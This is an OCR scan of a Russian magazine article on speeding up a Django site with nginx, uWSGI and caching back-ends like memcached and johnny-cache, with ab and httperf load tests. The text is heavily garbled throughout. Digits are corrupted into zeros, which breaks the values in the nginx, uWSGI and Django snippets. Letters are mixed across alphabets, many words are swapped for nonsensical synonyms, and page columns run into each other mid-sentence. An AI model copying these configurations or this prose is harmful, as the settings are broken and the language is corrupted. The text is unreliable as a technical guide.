# vi /etc/nginx/nginx.conf # Для успехи максимальной n рои звод равно тель н ости делаем # чис л насчёт рабочих пр оцессов равным чи сл у nроцессор ны х яде р worker_processes 0 ; # Даем рабо ч им nроцессам паче высок равно й nрио р итет worker_priority - 0; #Уменьшаем количество вызовов get timeofday{), ч тоб ы # н е ухлопать резервы на п устую timer_resolution 0eems ; error_log /var/log/nginx/error.log; pid /var/run/nginx.pid; events { # Одновременное контингент конн е ктов, # обслуж равным образом ваемых одн равно м р або чи м n роцессом worker_connections 0е24 ; # Оnция для того FreeBSD # use kqueue;

рассмотрим малость « универсальных>> методов кеширования,

начиная топорное оставление сгенерированных НТМL-страниц во

http {

памяти равно прозрачное кеширование запросов для БД, а тоже обсудим специфику применения тех либо — либо иных методов. Наконец, ты да я должны по правилам всё сие настроить, учитывая особенности используемого железа, диапазон оперативной памяти и т. д. Вопрос нынешний т акже многогранен, однако изрядно универсальных рекомендаций что ни говори существует.

ПРИСТУПАЕМ Начнем, что равным образом паркет ожено, от побег танов ки нужных нам программных

компонентов. Большинство с них лакомиться на репазитарии любого дис­ трибутива, оттого на этом месте всё просто:

ХАКЕР

03/158/2012

DJАNGОИСПОЛЬЗУЕТВСЮ МОЩЬ ЯЗЫКА

PYTHON, ЧТОБЫ

МАКСИМАЛЬНО РАЗГРУЗИТЬ ПРОГРАММИСТА 125


SYN/ACK

Ш

fог unixoid_Ьlog pгoject.

Django settings

fгom os BASEDIR

impoгt

path

=path.diгnameCpath.abspathC __ file __ ))

DEBUG=r 0 TEMPLATE DEBUG=DEBUG ADMINS=С С 'Evgeny Zobnin' , ), MANAGERS=ADMINS +г

# 'postgгesql_psycopg2',

'sqliteЗ'

DATABASE ENGINE=

'postgгesql',

'mysql',

'sqliteЗ'

что касается

'огасlе'.

DATABASE_NAME='db .sqlite' DATABASE_USER=' ' DATABASE_PASS~ORD

=

DATABASE_HDST= DATABASE_PDRT=' '

# # # #

# Ог path to database file if using sqliteЗ. used with sqliteЗ. used with sqliteЗ. to empty stгing fог localhost. Hot used with sqliteЗ. to empty stгing fог default. Hot used with sqliteЗ .

Not Not Set Set

TIME_ZDNE='Asya/Yekateгinbuгg' settings .py [pythonJ "settings.py" ВЗL, 0'1'15С Стандартный конфиг

#

[1,1J[1%J

Django ОЗУ, seпdfi l ell токмо вынудит nginx частосвопиться равно тем самым за­

Станда ртные опции

медлит его работу. Оnция tcp_ пopush заставляет ngiпx посылать

iпclude

/etc/пgiпx)mime.types;

access_log

/var/log/пgiпx/access.log;

НТТР-заголовки на одном батман кете, однако возлюбленная бесполезна не принимая во внимание

# Вкл ючаем ис употребление системного вызова seп dfile( )

sendfile.

GZIР-компрессия в свою очередь может выступить из сервером злую шутку.

seпdfile

оп;

С одной стороны, такая комnрессия уменьшаетобъем пере­

tcp_пopush

off;

даваемых сервером данных, вследствие чему симпатия можетуспеть

#

Держать kеераliv е-соединение открытым

keepalive_timeout #

Вклю чаем

gzip

05

склонить вяще заnросов, из другой- повышает нагрузку для

секу нд

05 ;

GZI Р-компрессию

процессор, зачем nриводит для стойком nротивоположному результату.

со

станда ртными

Поэтомуточно выяснить, нужна ли возлюбленная тебе, позволено всего лишь экспе­

опциями

оп;

риментальным путем, притом эксnерименты подобает влачить

0100 ; gzip_buffers 04 0k ; gzip_comp_level 0; gzip_http_versioп 0 . 0; gzip_proxied апу; gzip_types text/plaiп applicatioп/xml applicatioп/x-javascript text/css;

перед предельной нагрузкой .

gzip_miп_leпgth

Теперь самое эпоха предложить настройки сайта:

vi /etc/пgiпx/sites-eпaЬled/mysite server {

#

#

# На ~ тройки сайтов во отдельных конфигах (3то # станда ртный реестр пользу кого De biaп

Порт

listeп

равным образом

прозвище

сайта

00 ;

server_пame

host.com;

iпclude /etc/пgiпx/sites-eпaЫed/*;

} Несколько ремарок:

Приоритет рабочих процессов необходимо модифицировать со осторожно­ стью, по-другому они могут просто-напросто <<задавить» постоянно прочие сервисы,

включительно

memcached да

процессы базы данных. В идеале не чета

попробовать работу

nginx вместе с дефолтными

ТЕСТИРОВАНИЕ ПРОИЗВОДИТЕЛЬНОСТИ

настройками равно лишь Протестировать отдача веб-сервера позволяется со

а там починать ко экспериментам.

use kqueue немногоускоряет работу ngiпx закачаешься FгeeBSD благодаря использованию механизма kqueue наместо больше мед­ ленного epoll. • Системный извещение sendfilell применяется интересах единовременной от­ •

Опция

nравки содержимого целого файла во сокет. Метод от использованием

через утилиты аЬ изо комплекта

$

аЬ

-kc 000

-п

Apache:

00000 http://10.1.1.1/

Для сего равным образом используется специальная конспект httpeгf:

сего вызова работает быстрее, нежели стандартное последователь­

ноекопированиеданных,ипозволяетсэкономитьнаоперативной памяти. Однако, кабы сервер оснащен недостаточным численностью

026

$ httperf --hog --server=10.1.1.1 \ --wsess=2000,10,2 --rate 000 --timeout 0 ХАКЕР

03/158/201 0


Испытание нагрузкой

# Стандартные настройки журналирования access_log /var/ log / ngin x/ Ьlog-access.log ; error_log /var/ log /n gin x/Ьlog - error.log; # Адрес статики, используемой на админке Django location лN / media / { root / usr / local / lib / python2. 0/ dist-packages / django/contrib/admin; } # Статика самого сайта location л. + \.( jpg[jpeg [g if[png[ico [css [ zip[tgz [g z [rar [bz2[ [pdf[ppt[t xt[tar[ [bmp[js[mov) { root /var /www/host.com

N.

} # Адрес да габариты WSGI-гeйтa location / { uwsgi_pass 027.8 . 0.1 : 0812 ; include uwsgi_params;

Здес ь нисколько необычного: указываем корневой реестр сайта

/vaг/www/host.com равно а д рес uWSGI-cepвepa

027.0.0.1:8012. При­

ступаем ко настройке Django равным образом uWSGI.

НАСТРОЙКА DJANGO И UWSGI Настроит ь Dj ango ради совместного использования из uWSGI адски

DJANGO 0.3 В

Django 0.3 синтаксис определения кеш-бэк - энда изменился равным образом

теnерь имеет соседний вид:

# Пример чтобы memcached (два сервера) CACHES={ ' default' : 'BACKEND' : 'django . core.cache.backends.memcached. MemcachedCache' , 'LOCAТION' : [ '172.19.26.248:11211 ' , '172.19 . 06 . 042:11211 ' ,

# Пример с целью БА CACHES={ 'default' : { 'BACKEND' : 'django.core.cache.backends.db. DatabaseCache' , 'LOCATION' : 'имя_ таблицы' ,

прос т о. Д ля сего порядочно воплотить в жизнь три простых действия, которые перечислены ниже.

0.

Создать самоуправно Django-npoeкт:

# cd /var/www # django-admin.py startproject mysite

import django.core.handlers.wsgi applicat ion=django.core.handlers.wsgi.WSGIHandler() 3. Запустить uWSGI-cepвep [опция "-р" определяе т сумма

0. Поместить на образован ны й список двуха файла:

рабочих процессовl:

django.xml <uwsgi > <socket> 027.8 .8. 0 :8812 </socket> <pythonpath >/var/www/mysit e/</pythonpath > <module >django_wsgi </module> </uws gi > django_wsgi.py import os os.environ[ 'DJANGO_SETTINGS_MODULE' ]

# uwsgi

0 -s 027.8.8 .1 :8812

Скриптое автозапуска на комплекте uWSGI нет, посему послед­

нюю команду уймись сумме вставить куда-нибудь во /etc/гc . local:

# vi /etc/rc.local cd /var/www/mys ite uwsgi -р 0 -s 027.8.8.1:8812

'settings'

НАСТРОЙКА КЕШ-БЭК-ЭНДА Теперь всё чаятельно бы настроено равным образом работает, да пишущий сии строки переходим к самой интересной равно важной части статьи. Кеширование крити­ чески важнецки ради быстродействия любого динамического сайта, вне зависимости ото технологий, возьми которых спирт построе н . Мы должны опошлить тяжба переваривания равно отдачи сервером

динамической составляющей. Е сть мало-мальски способов решения этой задачи, да в этом месте всё зависит с специфики веб-сайта. Во-первых, дозволяется невыразительно кешировать безвыездно со тр аницы сайта. Это

самый безыскусственный равно по части ч ень быстро реализуемый из п омо щь ю Dj ango способ. Однако возлюбленный является равным образом самым неэффективным: что бы ни из­ менение страницы приведет для промаху мимо иннокентий да повторной загрузке страницы на него. Изменение может бытовать каким угодно:

износ счетчика получай сайте, приход нового коммента­ рия, реновация списка популярных статей равно разделов. Поэтому полное кеширование имеет идея подключать лишь только дл автор этих строк более­

не в этакий мере статич ны х сайтов что-то блогов, со л оварей, эн ц иклопедий и т. п.

Во-вторых, не возбраняется кешировать данные, загружаемые с БД. Также несложно реализуемый, хотя архи небесспорный облик оптимизации. Методы да бэк-энды кеwирования на

ХАКЕР

03 /158/ 0012

Django

Он результативен всего лишь к тех сайтов, идеже осуществляется

027


SYN/ACK

бездна операций чтения изБДимало операций записи, ей-ей равным образом в таком случае

CGI glue between Nginx and Django

как только на томик случае, когда само х ранилище кеш а работает быстрее

(higher is better)

механизма ко еширования базы данных . Другими словами, ке­

0500

ширование результатов выдержка с БД подойдет, ещё же, для более-менее статичных сайтов, размещенных получи и распишись сервере, кото­ рый имеет наглядный широта памяти для того нормальной работы

0000

memcached. В-третьИх, кешировать не возбраняется наездами изменяемые фрагмен­

u

с о (.)

твоя милость шаблонов. Этот путь подойдет прагматично на любого сай­

0500

~

та, возлюбленный будет дешев и, бери моего зырк , самый эффективен.

а;

Однако, во разница ото первых двух, симпатия требует работы напильни­

а.

%!

килоом равным образом невыгодный имеет прямого связи ко администрированию как бы

0000

ф

:;,

таковому. Логикой равным образом архитектурой занимаются программисты.

~

Е

Также большое достоинство имеет коллекция хранилища ради кешире-

000

ванных данных. Djaпgo предлагает нам четверка варианта:

memcached- начетисто во плане памяти, да архи эффективно; оперативная память- не в ёбаный степени затратно, хотя равно меньше эффективно;

несгибаемый диск- бог неэффективно равным образом ахти дешево;

cgi middleware server

фундамент данных-более эффективно, хоть сколько-нибудь дороже.

0

Первые двойка подойдут ради владельцев выделенных серве­

0

fcgi (thread ed) gunicam (1 О

fcgi (prefark 0 О gunic am (2 gunicam (5 processors) workers) workers) О uwsgi (2 warkers) 0 uwsgi (5 wa rkers) О uwsgi ( 0О warkers)

0

workers)

ров, последние банан позволено употреблять получи хостинге инедорогих

VPS'кax. Хотя, конечно, выгодно отличается подвергнуть проверке производитель­ ность на реальных условиях равным образом поднять как никогда надлежащий

Ненагрузачное отлаживание

uWSGI

модифицирование .

Теперь что до том, наравне аннексировать кеш-хранилище. Здесь всё просто­

открываем settiпgs.py проекта равным образом пишем следующее: а ко , если бы твоя милость решил, никак не страшно заморачиваясь со настройкой равным образом

# Локальный memcached CACHE_BACKEND='memcached://127.0.0.1:11211/'

шаблонами , выстрадать некоторой оптимизации, так кеширование

#База правда нных ( ко ак соз наделить та блицу,

их одновременное кеширование безвыгодный имеет смысла, при всем том кеши­

всех страниц сайта равным образом записей БД- твой выбор. Сразу скажу, что-нибудь

по части п иса хотя н иже)

рование из траниц равно записей сообразно отдельности, вроде автор этих строк ранее упоминал,

CACHE_BACKEND='dЬ://имя_таблицы' # Файлова ваш покорный слуга систем а CACHE_BACKEND='filе:///nуть/до/файла' # Оперативная память CACHE_BACKEND='locmem:///' # Фи для т ивный ке ш (для крата работки ) CACHE_BACKEND='dummy:///'

может доставить безупречный итог получай побольше либо — либо больше статичных са йтах.

Для включения кеширования токмо сайта средствами Django достаточно сообщить всего делов двоечка изменения на settiпgs . py:

Во втором случае должен прежде разбудить таблицу в базе данных. Делается сие от через стандартного maпage.py:

# python manage.py

createcachetaЫe

имя_таблицы

Любой образец бэк-энда поддерживает следующие аргументы:

timeout- промежуток времени жизни кешираванных данных во секундах !по умолчанию 0001; т ахти eпtгies- максимальное доля записей на кеш е !по

# Вкл ю чаем ке ш ирован ие MIDDLEWARE_CLASSES=( # Важ да поместить э ту от троку во нача ле 'django.middleware.cache.CacheMiddleware' , #Здесь иду т целое прочие mi ddleware .. • 'django.middleware.cache.FetchFromCacheMiddleware' , #

Указываем "с ро для

годности"

иннокентий на мгновение х

CACHE_MIDDLEWARE_SECONDS='Зee·

Это всё. Теперь любая сгенерированная изо шаблона лист

умол~а'нию 0001;

довольно на удочку во кеш. Просто да тупо. Несколько паче интел­

cull_fгequeпcy- дисконт старых записей, которые удаляются

лектуальный сnособ заключается на исnользованиикешадля

сообразно достижении max_eпtгieslпo умолчанию 0, в таком случае лакомиться третья часть всех

хранения результатов выпись на БД . Для его реализации наравне крат

записей!.

равно нужен данный раньше johnпy-cache, какой использует

memcached на качестве бэк-энда. Активация осуществляется на три Для передачи аргументов используется синтаксис САСНЕ

BACKEND

CGI,

например:

"locmem:///?timeout=Зe&ma x_eпtries=4ee"

шага. Добавляем johпny-cache во прейскурант Оjаngо-приложений:

INSTALLED_APPS=( ' j ohnпy' ,

НАИБОЛЕЕ ЭФФЕКТИВНЫЙ МЕТОД КЕШИРОВАНИЯ-СОХРАНЕНИЕ

ТОЛЬКО ИЗБРАННЫХ ЧАСТЕЙ

Далее подключаем подобающий middleware:

MIDDLEWARE_CLASSES=( 'johnny.middleware. LocalStoreClearMiddleware ' , 'johnny.middleware.QueryCacheMiddleware ' ,

СГЕНЕРИРОВАННЫХ ВЕБ-СТРАНИЦ 128

ХАКЕР

03/158/2012


Испытание нагрузкой

Затем указы ва ем на качес тв е кеш-бэк-знда

memcached

да

платеж пользу кого его ключей !чтобы избежать конфлик т ов со другими записями на memcachedl:

CACHE_BACKEND= 'johnny.backends . memcached : //127 . 0.8 . 0:11211' JOHNNY_MIDD(EWARE_K EY_PREFIX='jc_host_ com'

i